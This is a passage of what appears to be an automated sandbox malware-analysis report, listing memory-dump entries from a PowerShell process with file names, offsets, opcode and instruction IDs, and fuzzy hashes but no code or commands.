                                      • Instruction Fuzzy Hash: E4214A34B001189FDB08DFA8D5849ADFBF2FF88210B258199E815AB761CB35EC46CF94
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b957df4d936554d28e0b905995bc309d5a48f034216e9ffd3c57fd8f033e30af
                                      • Instruction ID: 0d99be7ef98a74c983b9678ee492dcb55c5a089e48f139f27f493a06ad566f98
                                      • Opcode Fuzzy Hash: b957df4d936554d28e0b905995bc309d5a48f034216e9ffd3c57fd8f033e30af
                                      • Instruction Fuzzy Hash: 97A17E35A052559FCB05CFA8D880AAEBBF2FF89310B1584A9E445EB361C735EC46CF90
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66983ce6274a93f208a5257e710a6ed9145cd09e7700abd6c8798e31facbdb4e
                                      • Instruction ID: 2f7a5c6e9200a67db6095e910ea6ecd6c8d1a51329ac1fcfda3e98b6ddc509b2
                                      • Opcode Fuzzy Hash: 66983ce6274a93f208a5257e710a6ed9145cd09e7700abd6c8798e31facbdb4e
                                      • Instruction Fuzzy Hash: E8918E70A046068FCB45CF58C4A4AAEFBB5FF49310B248599D915EB3A1C736ED51CFA0
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c59a6a2b2d24a48f42d2ecc6b35417b799fe7c6cdb4db1cd9613f98ec5f02ae
                                      • Instruction ID: 68d6267f7719f750959f220f379f625ec73c92fd656e7b53b4ab47796d801229
                                      • Opcode Fuzzy Hash: 1c59a6a2b2d24a48f42d2ecc6b35417b799fe7c6cdb4db1cd9613f98ec5f02ae
                                      • Instruction Fuzzy Hash: 0F414974A0061A8FCB49CF58C0A4AAEF7B5FF48310B118569D905AB364C732FE91CF90
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 359eeaeaf14c41a16e82fd4da8c5e7762531c1828e4fe5e8c8b6844de55ceaa8
                                      • Instruction ID: a781f762766ecded6b69c25d0edf7be9426297c404b7bb7d258757e18980fab3
                                      • Opcode Fuzzy Hash: 359eeaeaf14c41a16e82fd4da8c5e7762531c1828e4fe5e8c8b6844de55ceaa8
                                      • Instruction Fuzzy Hash: 7F11E238A005189FDB04DFA9D68499DFBF2FF88311F2981A9E804A7711C735AD81CF90